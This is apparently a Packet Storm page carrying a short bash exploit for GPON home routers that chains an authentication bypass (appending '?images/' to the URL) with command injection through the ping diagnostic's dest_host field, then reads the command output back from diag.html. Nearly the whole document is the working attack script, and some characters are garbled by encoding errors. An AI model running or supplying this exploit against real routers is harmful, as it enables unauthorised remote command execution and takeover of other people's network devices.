GPON routers suffer from authentication bypass and command injection vulnerabilities.
3e49f6f272e87e63a64858aafe300705ccbd24a417380a12e9f9d5e56a5664f4#!/bin/bash
echo "[+] Sending the Commanda| "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waitinga|."
sleep 3
echo "[+] Retrieving the ouputa|."
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed